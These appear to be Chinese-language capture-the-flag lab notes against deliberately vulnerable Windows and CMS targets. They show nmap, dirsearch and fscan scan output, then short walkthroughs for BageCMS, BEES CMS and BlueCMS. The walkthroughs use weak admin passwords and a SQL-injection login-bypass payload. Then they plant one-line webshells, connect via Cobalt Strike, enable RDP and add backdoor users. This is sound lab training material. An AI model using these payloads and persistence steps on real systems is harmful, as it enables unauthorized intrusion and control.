PTH

Nmap [root@Hacking] /home/kali/vulntarget-a ❯ nmap 192.168.237.132 -A PORT STATE SERVICE VERSION 80/tcp open http nginx | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3 | http-robots.txt: 1 disallowed entry |_/ 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) MAC Address: 00:0C:29:99:58:97 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: specialized|phone Running: Microsoft Windows 7|Phone OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0 Network Distance: 1 hop Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:99:58:97 (VMware) |_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s | smb2-security-mode: | 2:1:0: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: win7-PC | NetBIOS computer name: WIN7-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2025-09-04T10:23:53+08:00 | smb2-time: | date: 2025-09-04T02:23:53 |_ start_date: 2025-09-04T02:22:36 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) TRACEROUTE HOP RTT ADDRESS 1 0.32 ms 192.168.237.132 Dirsearch [root@Hacking] /home/kali/vulntarget-a ❯ dirsearch -u 'http://192.168.237.132/' _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://192.168.237.132/ [10:37:07] Scanning: [10:37:08] 400 - 166B - /\..\..\..\..\..\..\..\..\..\etc\passwd [10:37:11] 301 - 178B - /api -> http://192.168.237.132/api/ [10:37:11] 403 - 564B - /api/ [10:37:11] 403 - 564B - /attachment.asp [10:37:11] 403 - 564B - /attachment.aspx [10:37:11] 403 - 564B - /attachment.jsp [10:37:11] 403 - 564B - /attachment.html [10:37:11] 403 - 564B - /attachment.htm [10:37:11] 403 - 564B - /attachmentedit.asp [10:37:11] 403 - 564B - /attachmentedit.aspx [10:37:11] 403 - 564B - /attachmentedit.html [10:37:11] 403 - 564B - /attachmentedit.jsp [10:37:11] 403 - 564B - /attachmentedit.htm [10:37:11] 403 - 564B - /attachments [10:37:11] 403 - 564B - /attachments.aspx [10:37:11] 403 - 564B - /attachments.jsp [10:37:11] 403 - 564B - /attachments.html [10:37:11] 403 - 564B - /attachments.htm [10:37:11] 403 - 564B - /attachments.asp [10:37:13] 200 - 894B - /favicon.ico [10:37:13] 301 - 178B - /general -> http://192.168.237.132/general/ [10:37:14] 301 - 178B - /images -> http://192.168.237.132/./images/ [10:37:14] 403 - 564B - /./images/ [10:37:14] 403 - 564B - /./images/Sym.php [10:37:14] 403 - 564B - /./images/c99.php [10:37:14] 301 - 178B - /inc -> http://192.168.237.132/inc/ [10:37:14] 403 - 564B - /inc/ [10:37:14] 200 - 10KB - /index.php [10:37:14] 400 - 166B - /index.php::$DATA [10:37:14] 200 - 10KB - /index.php. [10:37:14] 200 - 10KB - /index.pHp [10:37:15] 301 - 178B - /mobile -> http://192.168.237.132/mobile/ [10:37:16] 301 - 178B - /portal -> http://192.168.237.132/portal/ [10:37:17] 200 - 26B - /robots.txt [10:37:17] 301 - 178B - /share -> http://192.168.237.132/share/ [10:37:17] 200 - 0B - /share/ [10:37:17] 200 - 2KB - /portal/ [10:37:18] 301 - 178B - /static -> http://192.168.237.132/static/ [10:37:18] 301 - 178B - /static.. -> http://192.168.237.132/static/ [10:37:18] 403 - 564B - /templates/beez/index.php [10:37:18] 403 - 564B - /templates/ja-helio-farsi/index.php [10:37:18] 403 - 564B - /templates/rhuk_milkyway/index.php [10:37:18] 400 - 166B - /Trace.axd::$DATA [10:37:19] 400 - 166B - /web.config::$DATA [10:37:19] 301 - 178B - /WebService -> http://192.168.237.132/WebService/ Task Completed 下文中IP我改动了一下，因为有些工具在kali不好用 ...

BageCMS fscan扫描到9652端口运行着CMS，版本大概率是3.1 进入/index.php?r=admini，通过弱密码：admin/admin123456进入到后台，编辑模板添加一句话木马 连接蚁剑，在根目录拿到flag1 开启RDP，添加后门用户 ...

BEES CMS fscan扫描到6582端口 经过搜索发现后台登录的用户名处存在SQL注入 通过联合注入伪造登录 user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dd18&submit=true&submit.x=0&submit.y=0 在后台进行上传文件 连接成功，在根目录拿到flag1 上线cs，开启RDP，添加后门用户 ...

BlueCMS fscan扫描到192.168.10.10:5820端口开放，并且运行了Bluecms，并且版本是v1.6 进入到/admin管理员登录界面，尝试弱密码登录成功：admin/admin123456 来到模板管理，编辑第一个进行抓包 添加一句话木马，修改一下文件名，连接成功，在根目录拿到flag1 已经是最高权限了，直接上线CS 添加后门用户以及开启RDP ...

Fscan [root@Hacking] /home/kali/Desktop ❯ ./fscan -h 192.168.10.10 -p 80 ⏎ ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-07-16 22:41:57] [INFO] 暴力破解线程数: 1 [2025-07-16 22:41:57] [INFO] 开始信息扫描 [2025-07-16 22:41:57] [INFO] 最终有效主机数量: 1 [2025-07-16 22:41:57] [INFO] 开始主机扫描 [2025-07-16 22:41:57] [INFO] 有效端口数量: 1 [2025-07-16 22:41:57] [SUCCESS] 端口开放 192.168.10.10:80 [2025-07-16 22:42:03] [SUCCESS] 服务识别 192.168.10.10:80 => [http] [2025-07-16 22:42:03] [INFO] 存活端口数量: 1 [2025-07-16 22:42:03] [INFO] 开始漏洞扫描 [2025-07-16 22:42:03] [INFO] 加载的插件: webpoc, webtitle [2025-07-16 22:42:04] [SUCCESS] 网站标题 http://192.168.10.10 状态码:200 长度:25157 标题:易优CMS - Powered by Eyoucms.com [2025-07-16 22:42:11] [SUCCESS] 目标: http://192.168.10.10:80 漏洞类型: poc-yaml-thinkphp5023-method-rce 漏洞名称: poc1 详细信息: links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce [2025-07-16 22:42:14] [SUCCESS] 扫描已完成: 2/2 发现存在thinkphp的rce漏洞 ...